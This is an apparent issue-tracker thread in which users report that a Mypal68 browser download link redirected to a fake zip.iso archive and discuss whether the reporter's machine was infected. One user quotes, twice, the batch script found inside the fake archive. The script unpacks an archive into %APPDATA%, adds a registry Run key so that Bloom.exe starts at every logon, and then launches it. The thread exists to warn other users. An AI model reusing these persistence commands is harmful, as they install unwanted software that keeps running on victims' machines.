NoNameNeeded2
commented
2 years ago THIS link only downloads Mypal68: https://anonfiles.com/faI7k4U1xb/mypal-68.12.1.en-US.win32_zip
So I don't know which link you're talking about.
Closed manOnWebs closed 2 years ago
NoNameNeeded2
commented
2 years ago THIS link only downloads Mypal68: https://anonfiles.com/faI7k4U1xb/mypal-68.12.1.en-US.win32_zip
So I don't know which link you're talking about.
manOnWebs
commented
2 years ago I tried to download Mypal68 on windows xp and got this link (pls dont click is virus)
NoNameNeeded2
commented
2 years ago Maybe you got redirected or something but that's obviously not the anonfiles link (it says airplanegoobly.com)
manOnWebs
commented
2 years ago I did get redirected.
win98se
commented
2 years ago I suspect your computer is already infected by viruses prior. Try to use a smartphone to access that link and see if the issue persists?
manOnWebs
commented
2 years ago I suspect your computer is already infected by viruses prior. Try to use a smartphone to access that link and see if the issue persists?
It downloaded as a txt file and so i knew it was that virus
manOnWebs
commented
2 years ago just install adblock + noscript
I did it on windows xp so i couldn't install adblock and noscript
gdl-blue
commented
2 years ago I did it on windows xp so i couldn't install adblock and noscript
Mypal 28/29 supports NoScript. I used it before.
manOnWebs
commented
2 years ago Remove it please. When you click the download link, it downloads something called mypal-68.12.1.en-US.win32.zip.iso. There's a virus in that and there's a lnk file that goes to a file called resources.bat. Inside that contains: tar -xvf "app.zip" -C "%APPDATA%" reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v Bloom /f reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v Bloom /t REG_SZ /d "%APPDATA%\Bloom\Bloom.exe --Ii7SIeN" /f start /d "%APPDATA%\Bloom" Bloom.exe after that it infects your machine.
@manOnWebs by the way can you send that malware to my e-mail winlogon3683@gmail.com? I am curious about it and want to execute in a virtual machine
Sorry for the late reply, but i'll send the "malware" (It's adware, short answer.) to you.
Remove it please. When you click the download link, it downloads something called mypal-68.12.1.en-US.win32.zip.iso. There's a virus in that and there's a lnk file that goes to a file called resources.bat. Inside that contains:
tar -xvf "app.zip" -C "%APPDATA%" reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v Bloom /f reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v Bloom /t REG_SZ /d "%APPDATA%\Bloom\Bloom.exe --Ii7SIeN" /f start /d "%APPDATA%\Bloom" Bloom.exeafter that it infects your machine.